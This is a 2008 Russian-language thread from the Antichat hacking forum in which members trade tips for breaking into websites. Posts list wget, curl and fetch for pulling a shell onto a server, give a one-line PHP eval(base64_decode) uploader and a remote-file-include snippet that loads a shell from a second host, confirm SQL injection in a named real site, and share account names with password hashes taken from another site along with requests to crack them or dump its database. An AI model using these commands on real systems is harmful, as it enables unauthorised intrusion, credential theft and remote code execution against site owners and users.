HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.03.2008, 13:31
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

wget http://shell
curl
fetch
lynx
links
axel :d

смотря что есть на серваке
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #2  
Старый 23.03.2008, 13:40
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

если нет никаких качалок легче echo-нуть аплоуд скрипт в 1 строку ( echo '<?php+eval(base64_decode(тут_пхп_код_в_ бэйсе));?>' >1.php ) в файл, и через нее уже залить
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #3  
Старый 23.03.2008, 16:37
Spaise
Познающий
Регистрация: 21.03.2008
Сообщений: 39
С нами: 9547025

Репутация: 21
По умолчанию

Скажите пожалуйста, здесь есть уязвимость?
Цитата:
http://www.beiks.com/palm/showtitle.asp?titleid=350'
MSSQL
 
Ответить с цитированием

  #4  
Старый 23.03.2008, 17:17
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

есть, только это не MSSQL, а MS Access причем помогут скорее всего в этой скуле только подзапросы
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #5  
Старый 23.03.2008, 17:30
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами: 9560486

Репутация: 1809


По умолчанию

Ребят, подскажите как сделать дамп базы данных mysql или доступ по ftp получить ? Имеются логин и пароль вида - u15364/6cb1963d2018c3ea полученные через скуль.

Как расшифровать пароль? Или как сделать дамп? Есть еще данные файла /etc/passwd...
 
Ответить с цитированием

  #6  
Старый 23.03.2008, 17:42
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами: 9560486

Репутация: 1809


По умолчанию

Если кто то может помочь быстрее помогите плис ! Вот что выдала скуль - u15364/6cb1963d2018c3ea и admin/54e0c6945fa5e34c

Заранее всем спасибо!
 
Ответить с цитированием

  #7  
Старый 23.03.2008, 17:54
Spaise
Познающий
Регистрация: 21.03.2008
Сообщений: 39
С нами: 9547025

Репутация: 21
По умолчанию

Цитата:
Сообщение от mff  
Если кто то может помочь быстрее помогите плис ! Вот что выдала скуль - u15364/6cb1963d2018c3ea и admin/54e0c6945fa5e34c

Заранее всем спасибо!
Ищи админку или можешь попробывать зарегистрироваться на сайте и подставить в cookie свои данные, если cookie используются. Admin и u15364 - логины наверное, а то что после них - хеши. Про хеши читай здесь -> http://old.antichat.ru/txt/hashes/
Что тебе еще надо?
 
Ответить с цитированием

  #8  
Старый 23.03.2008, 18:08
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами: 9560486

Репутация: 1809


По умолчанию

Цитата:
Сообщение от Spaise  
Ищи админку или можешь попробывать зарегистрироваться на сайте и подставить в cookie свои данные, если cookie используются. Admin и u15364 - логины наверное, а то что после них - хеши. Про хеши читай здесь -> http://old.antichat.ru/txt/hashes/
Что тебе еще надо?
Спасиб, почитаю, сейчас перебираю при помощи PaswordsPro, но боюсь что это на долго...

а ССЫЛОЧКА отстой. Нету там ничего по mysql. И всё равно спасибо!

Последний раз редактировалось mff; 23.03.2008 в 18:13..
 
Ответить с цитированием

  #9  
Старый 23.03.2008, 18:10
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами: 10362626

Репутация: 327
По умолчанию

Цитата:
Spaise как вариант можно залить фаил с содержанием <? include($s) ?>
назовём его a.php к примеру тогда шелл подключается таким образом
http//site.com/a.php?s=http//sait2.com/фаил с шелом .php
в место include() можно использовать ещё и :
readfile()
fopen+fwrite+feof+fread
file_get_contents()
require()
не говоря уже про system('curl/get/fetch/lynx/etc')...
почему сразу <? include($s) ?>

а если register_globals off? а если url access disabled?)

Последний раз редактировалось blackybr; 23.03.2008 в 18:21..
 
Ответить с цитированием

  #10  
Старый 23.03.2008, 18:18
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами: 10362626

Репутация: 327
По умолчанию

mff,
_http://injection.rulezz.ru/ по ижекту почитай..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.